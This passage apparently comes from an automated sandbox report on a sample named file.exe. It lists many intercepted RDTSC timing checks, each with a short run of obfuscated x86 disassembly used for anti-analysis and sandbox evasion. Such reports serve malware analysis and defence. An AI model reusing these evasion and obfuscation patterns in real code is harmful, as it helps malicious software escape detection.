              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE0123 second address: AE0135 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 jbe 00007FD184FDBE80h 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE0135 second address: AE019E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007FD185A97D08h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000019h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 mov dword ptr [ebp+122D1A10h], eax 0x00000027 push 00000000h 0x00000029 mov edi, dword ptr [ebp+122D253Ch] 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push edi 0x00000034 call 00007FD185A97D08h 0x00000039 pop edi 0x0000003a mov dword ptr [esp+04h], edi 0x0000003e add dword ptr [esp+04h], 0000001Dh 0x00000046 inc edi 0x00000047 push edi 0x00000048 ret 0x00000049 pop edi 0x0000004a ret 0x0000004b mov ebx, 0F55E600h 0x00000050 xchg eax, esi 0x00000051 push eax 0x00000052 push edx 0x00000053 push esi 0x00000054 push ecx 0x00000055 pop ecx 0x00000056 pop esi 0x00000057 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE019E second address: AE01B7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jg 00007FD184FDBE7Ch 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE2360 second address: AE2364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE341B second address: AE341F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE506C second address: AE5086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD185A97D06h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007FD185A97D0Ch 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE5086 second address: AE508B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE2364 second address: AE2387 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FD185A97D16h 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE6FDD second address: AE7013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD184FDBE76h 0x0000000a popad 0x0000000b jmp 00007FD184FDBE7Eh 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FD184FDBE89h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE7013 second address: AE70A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD185A97D17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FD185A97D08h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 call 00007FD185A97D19h 0x00000029 jc 00007FD185A97D15h 0x0000002f jmp 00007FD185A97D0Fh 0x00000034 pop edi 0x00000035 mov ebx, 43E91245h 0x0000003a push 00000000h 0x0000003c mov dword ptr [ebp+122D1E0Fh], ebx 0x00000042 push 00000000h 0x00000044 pushad 0x00000045 mov dx, 8A5Ah 0x00000049 or dword ptr [ebp+122D2404h], edi 0x0000004f popad 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 jnp 00007FD185A97D06h 0x0000005a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE616B second address: AE617B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007FD184FDBE76h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE617B second address: AE61F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD185A97D14h 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007FD185A97D08h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 push dword ptr fs:[00000000h] 0x0000002e mov edi, 0A6113D8h 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a sub dword ptr [ebp+122D28BBh], ebx 0x00000040 mov eax, dword ptr [ebp+122D0ADDh] 0x00000046 mov edi, esi 0x00000048 push FFFFFFFFh 0x0000004a stc 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f jnl 00007FD185A97D06h 0x00000055 jmp 00007FD185A97D13h 0x0000005a popad 0x0000005b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE8E15 second address: AE8E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007FD184FDBE78h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 mov dword ptr [ebp+122D1C04h], esi 0x00000029 push 00000000h 0x0000002b mov dword ptr [ebp+122D214Bh], ebx 0x00000031 push 00000000h 0x00000033 mov dword ptr [ebp+122D28BBh], edx 0x00000039 push eax 0x0000003a pushad 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9F01 second address: AE9F09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEAF79 second address: AEAF87 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD184FDBE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEAF87 second address: AEAFDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD185A97D0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FD185A97D08h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov ebx, dword ptr [ebp+122D567Dh] 0x0000002b push 00000000h 0x0000002d sub dword ptr [ebp+1245AA5Fh], edx 0x00000033 push 00000000h 0x00000035 movzx ebx, ax 0x00000038 xchg eax, esi 0x00000039 pushad 0x0000003a jg 00007FD185A97D0Ch 0x00000040 jl 00007FD185A97D06h 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA140 second address: AEA146 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA146 second address: AEA14C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEBFA2 second address: AEBFA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEB17C second address: AEB180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEB180 second address: AEB21E instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD184FDBE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 pop ebx 0x00000011 nop 0x00000012 or bx, 56CBh 0x00000017 push dword ptr fs:[00000000h] 0x0000001e push eax 0x0000001f add edi, dword ptr [ebp+122D29DEh] 0x00000025 pop ebx 0x00000026 mov dword ptr fs:[00000000h], esp 0x0000002d mov edi, 7A0CA9D1h 0x00000032 mov eax, dword ptr [ebp+122D13F9h] 0x00000038 push 00000000h 0x0000003a push esi 0x0000003b call 00007FD184FDBE78h 0x00000040 pop esi 0x00000041 mov dword ptr [esp+04h], esi 0x00000045 add dword ptr [esp+04h], 0000001Bh 0x0000004d inc esi 0x0000004e push esi 0x0000004f ret 0x00000050 pop esi 0x00000051 ret 0x00000052 jmp 00007FD184FDBE7Eh 0x00000057 and ebx, 0D1BAEB4h 0x0000005d push FFFFFFFFh 0x0000005f jmp 00007FD184FDBE85h 0x00000064 nop 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007FD184FDBE85h 0x0000006c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEB21E second address: AEB23A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD185A97D0Dh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 pop edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AECE7C second address: AECE83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AECE83 second address: AECEAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD185A97D0Fh 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD185A97D12h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AED07D second address: AED081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AED081 second address: AED087 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AED087 second address: AED08D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AED08D second address: AED091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEEECD second address: AEEED1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEEED1 second address: AEEED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEEED7 second address: AEEF30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD184FDBE7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov ebx, edi 0x0000000e add ebx, 148B0C7Fh 0x00000014 push 00000000h 0x00000016 pushad 0x00000017 push edx 0x00000018 mov dx, bx 0x0000001b pop esi 0x0000001c adc ch, 00000054h 0x0000001f popad 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push esi 0x00000025 call 00007FD184FDBE78h 0x0000002a pop esi 0x0000002b mov dword ptr [esp+04h], esi 0x0000002f add dword ptr [esp+04h], 00000018h 0x00000037 inc esi 0x00000038 push esi 0x00000039 ret 0x0000003a pop esi 0x0000003b ret 0x0000003c sbb ebx, 5B184EEEh 0x00000042 mov bx, 4867h 0x00000046 xchg eax, esi 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b pop eax 0x0000004c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE025 second address: AEE029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE029 second address: AEE037 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD184FDBE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEEF30 second address: AEEF3A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEEF3A second address: AEEF54 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007FD184FDBE7Dh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEEF54 second address: AEEF59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF1F3B second address: AF1F3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF1F3F second address: AF1F45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF1F45 second address: AF1F4A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A932BB second address: A932C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF6715 second address: AF6731 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD184FDBE82h 0x00000008 jng 00007FD184FDBE76h 0x0000000e jp 00007FD184FDBE76h 0x00000014 js 00007FD184FDBE7Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF69B6 second address: AF69C4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD185A97D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFCBD6 second address: AFCBE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD184FDBE76h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFCBE1 second address: AFCBE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFCBE7 second address: AFCBFF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a js 00007FD184FDBE84h 0x00000010 push eax 0x00000011 push edx 0x00000012 jng 00007FD184FDBE76h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFCDA3 second address: AFCDA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFCDA8 second address: AFCDC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FD184FDBE76h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD184FDBE7Eh 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFCDC6 second address: AFCDFC instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD185A97D11h 0x00000008 jmp 00007FD185A97D0Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FD185A97D19h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFCDFC second address: AFCE0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD184FDBE7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFCE0A second address: AFCE11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFCE11 second address: AFCE32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jmp 00007FD184FDBE7Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007FD184FDBE76h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A918A4 second address: A918A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A918A8 second address: A918D2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD184FDBE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007FD184FDBE76h 0x00000012 jmp 00007FD184FDBE88h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A918D2 second address: A918D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02E51 second address: B02E56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02E56 second address: B02E62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FD185A97D06h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02E62 second address: B02E66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02E66 second address: B02E72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02E72 second address: B02E7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD184FDBE76h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02E7C second address: B02E80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0254C second address: B02550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02550 second address: B0255D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B026F4 second address: B026F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02B56 second address: B02B5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02B5C second address: B02B68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02B68 second address: B02B72 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD185A97D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02CBE second address: B02CC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B02CC8 second address: B02CEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD185A97D0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007FD185A97D0Fh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA08AF second address: AA08B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0704E second address: B07057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B07057 second address: B0706C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007FD184FDBE76h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 pop eax 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0706C second address: B0707B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD185A97D0Ah 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0707B second address: B07081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B071AF second address: B071B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B071B5 second address: B071CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FD184FDBE83h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B07329 second address: B0732D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0732D second address: B07344 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD184FDBE83h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B0763C second address: B07640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B077AC second address: B077E8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD184FDBE8Bh 0x00000008 jmp 00007FD184FDBE85h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 jmp 00007FD184FDBE83h 0x00000017 pushad 0x00000018 popad 0x00000019 pop edx 0x0000001a push edi 0x0000001b pushad 0x0000001c popad 0x0000001d pop edi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B077E8 second address: B07802 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD185A97D10h 0x00000007 jl 00007FD185A97D0Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B06D4B second address: B06D65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 jmp 00007FD184FDBE82h 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B06D65 second address: B06D77 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jl 00007FD185A97D06h 0x00000009 pop ecx 0x0000000a jo 00007FD185A97D0Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
